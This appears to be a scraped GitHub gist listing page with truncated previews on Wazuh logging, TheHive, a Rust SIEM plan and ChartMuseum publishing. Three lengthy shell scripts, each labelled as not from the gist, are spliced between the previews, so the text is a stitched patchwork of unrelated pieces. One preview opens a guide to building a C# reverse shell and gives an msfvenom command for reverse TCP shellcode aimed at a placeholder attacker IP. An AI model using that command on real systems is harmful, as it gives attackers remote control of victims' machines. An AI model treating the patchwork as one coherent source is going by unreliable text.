Anubhav Gain anubhavg-icpl

Perfect! I found the profile API endpoints. The error you're seeing (/api/v1/profile returns NotFoundError) is because there's no direct GET endpoint for listing profiles in v1. However, I can see from the routing that profiles can be accessed. Let me explain how to list all profiles:

How to List All Profiles in TheHive

Based on the codebase analysis, here are the ways to list profiles:

Wazuh Agent: Collecting Kernel Logs from journald on Fedora

This document explains how to configure the Wazuh agent on a Fedora system to collect kernel logs from journald using journalctl, and how to verify and view them on the Wazuh Dashboard.


1. Configure the Wazuh Agent
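The agent side of that step, as an added example (this is not the gist's own text or configuration): a script that appends the journald `<localfile>` block to the agent's ossec.conf and runs the local checks before you look at the dashboard. It assumes a Wazuh agent 4.8 or later for the native journald log format (older 4.x agents get the `command` variant that polls `journalctl -k`), the default /var/ossec paths, and root.

```shell
#!/bin/sh
# Added example (not from the gist): make a Wazuh agent on Fedora read kernel
# messages from journald, then check locally before looking at the dashboard.
# Assumptions: Wazuh agent 4.8 or later for the native journald reader (older
# 4.x agents get the "command" variant), config at /var/ossec/etc/ossec.conf,
# agent log at /var/ossec/logs/ossec.log. Run as root.
set -eu

OSSEC_CONF="${OSSEC_CONF:-/var/ossec/etc/ossec.conf}"
OSSEC_LOG="${OSSEC_LOG:-/var/ossec/logs/ossec.log}"

# Print the <localfile> block for one of two modes:
#   journald  native reader; keep only entries whose _TRANSPORT field is "kernel",
#             i.e. exactly what "journalctl -k" shows
#   command   poll "journalctl -k" once a minute and send each line as an event
#             (the 60s interval and 1-minute lookback can double-count or miss a
#             line at the boundary; prefer the native reader when available)
render_localfile() {
  case "${1:-journald}" in
    journald)
      cat <<'EOF'
  <localfile>
    <log_format>journald</log_format>
    <location>journald</location>
    <filter field="_TRANSPORT">^kernel$</filter>
  </localfile>
EOF
      ;;
    command)
      cat <<'EOF'
  <localfile>
    <log_format>command</log_format>
    <command>journalctl -k --since "1 minute ago" --no-pager -o short-iso</command>
    <frequency>60</frequency>
    <alias>journald-kernel</alias>
  </localfile>
EOF
      ;;
    *)
      echo "render_localfile: unknown mode '$1'" >&2
      return 2
      ;;
  esac
}

# Append the block as an extra <ossec_config> section; the agent merges every
# section in the file. Idempotent: re-running with the same mode is a no-op.
install_localfile() {
  mode="$1"
  conf="$2"
  case "$mode" in
    journald) marker='<location>journald</location>' ;;
    command)  marker='<alias>journald-kernel</alias>' ;;
    *) echo "install_localfile: unknown mode '$mode'" >&2; return 2 ;;
  esac
  if grep -qF "$marker" "$conf"; then
    return 0
  fi
  cp -p "$conf" "$conf.bak.$(date +%Y%m%d%H%M%S)"
  {
    echo '<ossec_config>'
    render_localfile "$mode"
    echo '</ossec_config>'
  } >> "$conf"
}

# Local checks: the kernel ring buffer is readable through journald, the agent
# restarts with the new config, and the agent log mentions the journald source
# without logcollector errors for it.
verify_agent() {
  journalctl -k -n 5 --no-pager
  systemctl restart wazuh-agent
  sleep 5
  grep -iE 'journald|journalctl' "$OSSEC_LOG" | tail -n 5
  if grep -qE 'logcollector.*ERROR.*journal' "$OSSEC_LOG"; then
    echo "logcollector reported errors for the journald source" >&2
    return 1
  fi
}

# Usage: sudo sh wazuh-journald.sh apply [journald|command]
if [ "${1:-}" = "apply" ]; then
  install_localfile "${2:-journald}" "$OSSEC_CONF"
  verify_agent
fi
```

Once events reach the manager, only entries that match a rule at or above the manager's alert level become alerts; to see every kernel line in the dashboard, enable `<logall_json>yes</logall_json>` in the manager's `<global>` section and search the archives index. Either way, filtering on the `location` field (`journald` for the native reader, `journald-kernel` for the command alias) isolates this source.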

# GNU/Linux Resource List
##### Shells
✅ <a href="https://www.gnu.org/software/bash/"><b>GNU Bash</b></a> - is an sh-compatible shell that incorporates useful features from the Korn shell and C shell.<br>
✅ <a href="https://www.zsh.org/"><b>Zsh</b></a> - is a shell designed for interactive use, although it is also a powerful scripting language.<br>
✅ <a href="https://tcl-lang.org/"><b>tclsh</b></a> - is a very powerful cross-platform shell, suitable for a huge range of uses.<br>
✅ <a href="https://github.com/Bash-it/bash-it"><b>bash-it</b></a> - is a framework for using, developing and maintaining shell scripts and custom commands.<br>

Wazuh Agent Logging Capabilities: Comprehensive Technical Analysis

Wazuh agents provide enterprise-grade, multi-platform security monitoring with sophisticated log collection, parsing, and forwarding capabilities designed for XDR/OXDR platforms. This analysis reveals that Wazuh employs a modular architecture capable of processing 50,000+ events per second while maintaining minimal system overhead (35MB RAM average) and AES-256 encrypted communications. The platform's open-source nature, combined with extensive SIEM integration capabilities and MITRE ATT&CK framework alignment, positions it as a viable alternative to commercial endpoint detection solutions.

Agent architecture and core logging framework

Wazuh implements a distributed, modular agent architecture where specialized daemons handle distinct security monitoring functions. The core logging subsystem centers around the wazuh-logcollector daemon, which operates through multiple collection engines supporting diverse log formats and sour

Cross-Platform Rust-Based SIEM Platform Implementation Plan

A comprehensive security monitoring solution leveraging Rust's memory safety and performance for enterprise-grade threat detection across Windows, macOS, and Linux environments.

🎯 Executive Summary

This plan outlines the development and deployment of a next-generation Security Information and Event Management (SIEM) platform built on Rust-based technologies. The solution provides unified threat detection, incident response, and forensic analysis capabilities across heterogeneous environments while maintaining security-by-design principles.

Key Differentiators:

  • Memory Safety: 68% reduction in security vulnerabilities compared to C/C++ implementations

Agent Status Management Components

1. Primary Daemon: wazuh-remoted

The wazuh-remoted daemon is the core server-side component that manages agent communication and status. It handles the agent keepalive mechanism and updates agent status using the wdb_update_agent_keepalive(agent_id, AGENT_CS_ACTIVE, ...) function.

Location: The remoted daemon runs by default as the wazuh user and is chrooted to /var/ossec.

2. Agent Status Storage - Database Layer
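How that database layer can be queried and cross-checked from the manager, as an added example (not from the gist): it assumes a Wazuh 4.x manager with global.db at /var/ossec/queue/db/global.db, an `agent` table carrying `connection_status` and `last_keepalive` (epoch seconds), `sqlite3` installed on the manager, and `agents_disconnection_time` left at its 10-minute default. The row format and the sample rows in the test are constructed.

```shell
#!/bin/sh
# Added example (not from the gist): read agent status straight from the manager's
# global.db and check each row against the keepalive rule that remoted applies.
# Assumptions: Wazuh 4.x manager; global.db at /var/ossec/queue/db/global.db with
# an "agent" table holding connection_status and last_keepalive (epoch seconds);
# <agents_disconnection_time> in the manager's <global> section left at 10m.
set -eu

GLOBAL_DB="${GLOBAL_DB:-/var/ossec/queue/db/global.db}"
DISCONNECTION_TIME="${DISCONNECTION_TIME:-600}"   # seconds; matches the 10m default

# One line per agent: id|name|connection_status|seconds_since_last_keepalive.
# Opened read-only: wazuh-db owns the file and is the only writer.
list_agents() {
  sqlite3 -readonly -separator '|' "$GLOBAL_DB" \
    "SELECT id, name, connection_status, strftime('%s','now') - last_keepalive
       FROM agent WHERE id != 0 ORDER BY id;"
}

# Status remoted should have recorded for a given keepalive age in seconds.
expected_status() {
  if [ "$1" -le "$DISCONNECTION_TIME" ]; then
    echo active
  else
    echo disconnected
  fi
}

# Reads list_agents output (or constructed rows in that format) from stdin and
# prints agents whose stored status disagrees with their keepalive age. Rows in
# never_connected or pending are skipped: those states are not derived from the
# keepalive age. A row with no keepalive at all cannot justify "active", so an
# empty age is treated as disconnected. Returns 1 if any mismatch was found.
audit_status() {
  bad=0
  while IFS='|' read -r id name status age; do
    [ -n "$id" ] || continue
    case "$status" in
      never_connected|pending) continue ;;
    esac
    if [ -z "$age" ]; then
      want=disconnected
    else
      want="$(expected_status "$age")"
    fi
    if [ "$status" != "$want" ]; then
      echo "agent $id ($name): stored=$status expected=$want keepalive_age=${age:-none}s"
      bad=$((bad + 1))
    fi
  done
  [ "$bad" -eq 0 ]
}

# Usage on the manager: sudo sh agent-status-audit.sh run
if [ "${1:-}" = "run" ]; then
  list_agents | audit_status
fi
```

A non-empty mismatch list usually means wazuh-db or remoted is behind (the keepalive thread has not run yet, or the manager was restarted with a backlog), so compare against `agent_control -l` on the same host before treating it as a data problem.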

Complete Guide: Setting Up and Publishing Helm Charts to ChartMuseum

1. Setting Up ChartMuseum

Install ChartMuseum in Kubernetes

# Add ChartMuseum's Helm repo
helm repo add chartmuseum https://chartmuseum.github.io/charts

# Install ChartMuseum with API enabled for uploads
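The rest of that procedure carried through end to end, as an added example (these are not the gist's commands): install with the upload API on and basic auth in front of it, package a chart, push it through ChartMuseum's HTTP API, and confirm the repository index serves it. It assumes helm 3 and kubectl against a reachable cluster, a chart directory with a Chart.yaml, ChartMuseum reachable at CM_URL (for instance through `kubectl port-forward`), and that the release, namespace and repo alias names are ours.

```shell
#!/bin/sh
# Added example (not from the gist): bring up ChartMuseum with its upload API on
# and basic auth in front of it, package a chart, push it over the HTTP API, and
# check that the repository index lists it.
# Assumptions: helm 3 and kubectl against a reachable cluster; chart source in a
# directory with a Chart.yaml; ChartMuseum reachable at CM_URL (e.g. through
# "kubectl port-forward"); the release, namespace and repo alias names are ours.
set -eu

RELEASE="${RELEASE:-chartmuseum}"
NAMESPACE="${NAMESPACE:-chartmuseum}"
CM_URL="${CM_URL:-http://127.0.0.1:8080}"
CM_USER="${CM_USER:-chartadmin}"
CM_PASS="${CM_PASS:-}"

install_chartmuseum() {
  [ -n "$CM_PASS" ] || { echo "set CM_PASS before installing" >&2; return 1; }
  helm repo add chartmuseum https://chartmuseum.github.io/charts
  helm repo update
  # DISABLE_API defaults to true in the chart. Turning the API on without auth
  # lets anyone who can reach the service publish or replace charts, so basic
  # auth goes in the same command. ALLOW_OVERWRITE=false keeps released
  # versions immutable: a pushed name+version can never be silently replaced.
  helm upgrade --install "$RELEASE" chartmuseum/chartmuseum \
    --namespace "$NAMESPACE" --create-namespace \
    --set env.open.DISABLE_API=false \
    --set env.open.ALLOW_OVERWRITE=false \
    --set env.secret.BASIC_AUTH_USER="$CM_USER" \
    --set env.secret.BASIC_AUTH_PASS="$CM_PASS" \
    --set persistence.enabled=true
}

# "name version" from a chart directory's Chart.yaml (quotes stripped), so the
# archive we upload is the one "helm package" actually produces.
chart_meta() {
  name="$(sed -n 's/^name:[[:space:]]*//p' "$1/Chart.yaml" | head -n 1 | tr -d "\"'")"
  version="$(sed -n 's/^version:[[:space:]]*//p' "$1/Chart.yaml" | head -n 1 | tr -d "\"'")"
  if [ -z "$name" ] || [ -z "$version" ]; then
    echo "chart_meta: $1/Chart.yaml lacks name or version" >&2
    return 1
  fi
  echo "$name $version"
}

# Archive file name helm package will write for the chart directory.
chart_archive() {
  meta="$(chart_meta "$1")" || return 1
  echo "${meta% *}-${meta#* }.tgz"
}

push_chart() {
  dir="$1"
  archive="$(chart_archive "$dir")"
  helm package "$dir" --destination .
  # POST the tarball to the upload API: 201 Created on success, 409 Conflict when
  # the version already exists and overwrite is disabled. -f turns HTTP errors
  # into a non-zero exit so a rejected push stops the script.
  curl -fsS -u "$CM_USER:$CM_PASS" --data-binary "@$archive" "$CM_URL/api/charts"
  echo
}

# The pushed version must be served from the repo's index.yaml.
verify_published() {
  meta="$(chart_meta "$1")"
  name="${meta% *}"
  version="${meta#* }"
  helm repo add --force-update --username "$CM_USER" --password "$CM_PASS" mycm "$CM_URL"
  helm repo update
  helm show chart "mycm/$name" --version "$version" | grep -q "^version: $version"
}

# Usage: CM_PASS='...' sh chartmuseum-publish.sh run ./mychart
if [ "${1:-}" = "run" ]; then
  install_chartmuseum
  push_chart "${2:-./mychart}"
  verify_published "${2:-./mychart}"
fi
```

Leaving ALLOW_OVERWRITE at false is the supply-chain-relevant setting: a consumer pinning `mychart-0.1.0` keeps getting the same bytes, and a compromised publisher credential cannot replace an existing version in place.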

🛠️ Step-by-Step Guide to Creating a C# Reverse Shell

1. Generate Shellcode with msfvenom

Use msfvenom to create shellcode for a reverse TCP shell. Replace YOUR_IP with your attacker's IP address and YOUR_PORT with the desired port number:

msfvenom -p windows/x64/shell_reverse_tcp LHOST=YOUR_IP LPORT=YOUR_PORT -f csharp
anubhavg-icpl / EndpointSecurityDemo.m
Created April 23, 2025 10:10 — forked from Omar-Ikram/EndpointSecurityDemo.m
A demo of using Apple's EndpointSecurity framework - tested on macOS Monterey 12.2.1 (21D62)
//
// main.m
// EndpointSecurityDemo
//
// Created by Omar Ikram on 17/06/2019 - macOS Catalina 10.15 Beta 1 (19A471t)
// Updated by Omar Ikram on 15/08/2019 - macOS Catalina 10.15 Beta 5 (19A526h)
// Updated by Omar Ikram on 01/12/2019 - macOS Catalina 10.15 (19A583)
// Updated by Omar Ikram on 31/01/2021 - macOS Big Sur 11.1 (20C69)
// Updated by Omar Ikram on 07/05/2021 - macOS Big Sur 11.3.1 (20E241)
// Updated by Omar Ikram on 04/07/2021 - macOS Monterey 12 Beta 2 (21A5268h)